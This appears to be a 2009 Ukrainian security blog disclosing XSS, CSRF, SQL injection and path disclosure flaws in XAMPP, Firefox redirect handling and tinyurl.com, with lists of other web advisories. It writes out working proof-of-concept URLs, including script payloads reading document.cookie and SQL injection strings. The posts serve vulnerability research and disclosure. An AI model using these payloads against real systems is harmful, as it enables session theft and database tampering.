Websecurity - Веб безпека

25.06.2009

У червні, 23.06.2009, я знайшов Cross-Site Scripting, Cross-Site Request Forgery, SQL Injection та Full path disclosure уразливості в XAMPP. Про що найближчим часом сповіщу розробникам.

Раніше я вже писав про уразливості в XAMPP.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам системи.

01.08.2009

XSS:

http://site/xampp/ming.php?text=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

CSRF:

http://site/xampp/phonebook.php

Можна видаляти та додавати дані в тестовій таблиці (як через CSRF, так і через Insufficient Authorization уразливості). А також проводити SQL Injection через CSRF атаки.

XSS (persistent):

http://site/xampp/phonebook.php?lastname=%3Cscript%3Ealert(document.cookie)%3C/script%3E&firstname=1

http://site/xampp/phonebook.php?firstname=%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://site/xampp/phonebook.php?firstname=1&phone=%3Cscript%3Ealert(document.cookie)%3C/script%3E

SQL Injection:

http://site/xampp/phonebook.php?action=del&id=-1%20or%201=1

http://site/xampp/phonebook.php?lastname=',sqlite_version())/*&firstname=1 (mq off)

http://site/xampp/phonebook.php?firstname=',sqlite_version(),1)/* (mq off)

http://site/xampp/phonebook.php?firstname=1&phone='),(sqlite_version(),1,'1 (mq off)

Атака можлива при доступі в адмінку (через Insufficient Authorization), або через CSRF.

Full path disclosure:

http://site/xampp/phonebook.php?lastname=’&firstname=1

http://site/xampp/phonebook.php?firstname=’

http://site/xampp/phonebook.php?firstname=1&phone=’

Уразливі XAMPP 1.6.8 та попередні версії. Та потенційно наступні версії (включно з останньою версією XAMPP 1.7.1).

В даній добірці уразливості в веб додатках:

• Directory traversal in LANDesk Management Suite 8.80.1.1 (деталі)
• Webwasher Denial of Service Vulnerability (деталі)
• Multiple Vulnerabilities in AWStats Totals (деталі)
• ZoneMinder Multiple Vulnerabilities (деталі)
• Mini-NUKE v2.3 Freehost (tr) Multiple Remote SQL Injection Vulnerabilities (деталі)
• Crafty Syntax Live Help <= 2.14.6 SQL Injection (деталі)
• Secunia Research: Calendarix Basic Two SQL Injection Vulnerabilities (деталі)
• Multiple Local File Include Vulnerabilities in Pluck CMS 4.5.2 (деталі)
• Multiple Local File Include Vulnerabilities in ezContents CMS 2.0.3 (деталі)
• Security Bypass Vulnerabilities AXESSTEL (деталі)

В липні, 02.07.2009, я виявив Cross-Site Scripting уразливості в Mozilla та Firefox.

Які дозволяють обійти заборону на виконання JavaScript коду в location-header редиректорах (при редирекції на javascript: URI). Про XSS атаку через refresh-header редиректори в різних браузерах я писав в записі про Cross-Site Scripting уразливості в Mozilla, Internet Explorer, Opera та Chrome.

В Mozilla та Firefox на ASP сайтах (чи інших сайтах, що використовують відповідь “302 Object moved”), при запиті до location-header редиректора з вказанням JavaScript коду, браузер виводить сторінку “Object Moved”, де в лінці “here” виводить даний код. При натисканні на яку код спрацює. Тобто це Strictly social XSS.

XSS:

При запиті до скрипта на сайті:
http://site/script.php?param=javascript:alert(document.cookie)
Що поверне у відповіді заголовок Location:
HTTP/1.x 302 Object moved
Location: javascript:alert%28document.cookie%29
Браузер виводить сторінку “Object Moved”. При кліку по лінці “here” код спрацює в контексті даного сайту.

Робочі приклади ASP-редиректорів.

XSS:

На сервері Microsoft IIS 6.0:

• alert(document.cookie)
• цікавий

На сервері nginx 0.6.35:

• alert(document.cookie)
• цікавий (код спрацьовує в Mozilla)

Окрім javascript URI, також можна використати data URI для виконання JS-коду, якщо редиректор виводить в заголовку Location символи “;” і “,” у чистому (не в URL encoding) вигляді.

Уразливі Mozilla 1.7.x та попередні версії.

Уразливі Mozilla Firefox 3.0.12 (і 3.5.x також повинні бути уразливими) та попередні версії.

Також уразливі браузери: SeaMonkey 1.1.17, Firefox 3.6 a1 pre, Firefox 3.7 a1 pre, Orca Browser 1.2 build 5 та Maxthon 3 Alpha (3.0.0.145) з Ultramode. А також браузери Firefox 3.0.19, Firefox 3.5.11, Firefox 3.6.8, Firefox 4.0b2 та Opera 10.53 (при цьому версія Opera 9.52 невразлива).

[Оновлення: 04.08.2010]

Додав інформацію про використання data URI для виконання JS-коду в location-header редиректорах з відповіддю “302 Object moved”. Подібно до редиректорів з відповіддю “302 Found”.

[Оновлення: 07.08.2010]

Додав інформацію про інші уразливі браузери.

[Оновлення: 16.09.2012]

Як я виявив, у версіях Firefox 10.0.7 і Firefox 15.0.1 дана уразливість більше не працює - вона була приховано виправлена Mozilla в Firefox 9.0.

В даній добірці уразливості в веб додатках:

• Leopard Server Remote Path Traversal (Wiki Server from Mac OS X) (деталі)
• SunShop <= 4.1.4 SQL Injection (деталі)
• Vanilla <= 1.1.4 Script Injection / XSS (деталі)
• Ovidentia 6.6.5 XSS (index.php) (деталі)
• Directory traversal in 2X ThinClientServer v5.0_sp1-r3497 (деталі)
• vBulletin Cross Site Scripting Vulnerability (деталі)
• Null Byte Local file Inclusion in FAR - PHP Project version 1.0 (деталі)
• Evolution Vulnerability (деталі)
• OneNews Beta 2 Multiple Vulnerabilities (деталі)
• WESPA Calendario v1.1 Sql Injection Vulnerability (деталі)

Сьогодні я знайшов Cross-Site Scripting уразливості на проекті http://tinyurl.com. Про що найближчим часом сповіщу адміністрацію проекту.

Раніше я вже писав про уразливості на tinyurl.com.

XSS:

• alert(’XSS’)
• alert(document.cookie)

Дана XSS працює в браузерах Firefox та Opera, в зв’язку з Cross-Site Scripting уразливостями в Firefox та Opera. В даних браузерах можливе виконання JavaScript коду в location-header редиректорі на tinyurl.com (як й інших location-header редиректорах в Мережі). Що може бути викиростане для розповсюдження malware через даний сервіс редирекції.

Дана атака не дозволяє дістатися до кукісів. Для цього можна використати іншу XSS (через сервіс превью на preview.tinyurl.com), що дозволяє дістатися до кукісів та DOM.

XSS (Mozilla / Firefox / Opera / Chrome):

• alert(’XSS’)
• alert(document.cookie)

Це Strictly social XSS про яку я вже писав раніше.

Сервіс превью також доступний на домені tinyurl.com.

XSS (Mozilla / Firefox / Opera / Chrome):

• alert(’XSS’)
• alert(document.cookie)

Це також Strictly social XSS.

23.06.2009

Сьогодні я знайшов Cross-Site Scripting та Insufficient Anti-automation уразливості в XAMPP. Про що найближчим часом сповіщу розробникам.

Раніше я вже писав про уразливості в XAMPP.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам системи.

28.07.2009

XSS:

http://site/xampp/iart.php?text=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Insufficient Anti-automation:

http://site/xampp/mailform.php

При доступі в адмінку та якщо включений SMTP Service (Mercury Mail) можна відправляти спам в зв’язку з відсутністю захисту від автоматизованих запитів.

Уразливі XAMPP 1.6.8 та попередні версії. Та потенційно наступні версії (включно з останньою версією XAMPP 1.7.1).

В даній добірці уразливості в веб додатках:

• Aztech ADSL2/2+ 4 Port remote root (деталі)
• Multiple Security Vulnerabilities in Freeway eCommerce 1.4.1.171 (деталі)
• NewsHOWLER 1.03 Beta Cookie Handling Via Sql injection (деталі)
• PHP Live Helper <= 2.0.1 Multiple Vulnerabilities (деталі)
• munky-bliki lfi (деталі)
• Mambo 4.6.2 Full Version - Multiple Cross Site Scripting (деталі)
• FlexCMS <= 2.5 Cross Site Scripting Vulnerability (деталі)
• Vbulletin Plugin ChatBox Xss Vulnerability (деталі)
• DoS via SSL in lighthttpd (деталі)
• Sun Java Updates for Multiple Vulnerabilities (деталі)

В цьому місяці були оприлюднені численні уразливості в WordPress. Уразливі WordPress 2.8 та попередні версії, WordPress MU 2.7.1 та попередні версії, а також версія, що використовується на wordpress.com.

Були виявлені Local file include, Privileges unchecked, Cross-Site Scripting та Information disclosure уразливості.

Зокрема Local file include атака можлива через вектор, про який я писав ще в 2007 році в проекті День багів в WordPress (і який був неякісно виправлений розробниками WP). А також автори даного advisory згадали про Abuse of Functionality уразливість в WordPress, про яку я писав ще в квітні 2008 року.

• WordPress Privileges Unchecked in admin.php and Multiple Information Disclosures (деталі)

20.06.2009

У червні, 11.06.2009, а також додатково сьогодні, я знайшов Information Leakage, Cross-Site Request Forgery та SQL Injection уразливості в XAMPP. Про що найближчим часом сповіщу розробникам.

Раніше я вже писав про уразливості в XAMPP.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам системи.

25.07.2009

Information Leakage:

http://site/xampp/phpinfo.php

При доступі в адмінку (через Insufficient Authorization уразливості) можна отримати багато інформації про систему.

CSRF:

http://site/xampp/cds.php

Можна видаляти та додавати дані в тестовій таблиці (як через CSRF, так і через Insufficient Authorization уразливості). А також проводити SQL Injection через CSRF атаки.

SQL Injection:

http://site/xampp/cds.php?action=del&id=-1%20or%201=1

http://site/xampp/cds.php?interpret=1&titel=1&jahr=1),(version(),1,1

http://site/xampp/cds.php?interpret=1&titel=’,1,1),(version(),1,1)/* (mq off)

http://site/xampp/cds.php?titel=1&interpret=’,1),(version(),1,1)/* (mq off)

Атака можлива при доступі в адмінку (через Insufficient Authorization), або через CSRF.

Уразливі XAMPP 1.6.8 та попередні версії. Та потенційно наступні версії (включно з останньою версією XAMPP 1.7.1).

В даній добірці уразливості в веб додатках:

• Watchguard Firebox PPTP VPN User Enumeration Vulnerability (деталі)
• Xampp Linux 1.6.7 Multiple Cross Site Scripting Vulnerabilities (деталі)
• Websphere MQ MCAUSER Setting Bypass Vulnerability (деталі)
• Websphere MQ Security Exit Authentication Bypass Vulnerability (деталі)
• e107 <= 0.7.11 Arbitrary Variable Overwriting (деталі)
• Local File Include Vulnerability in Gallery 1.5.7, 1.6-alpha3 (деталі)
• Magnet Blog Sql Injection Vulnerability (деталі)
• K-Links Directory Blind SQL Injection Exploit (деталі)
• Ovidentia Sql Injection (деталі)
• Kayako SupportSuite < 3.30.00 Multiple Vulnerabilities (деталі)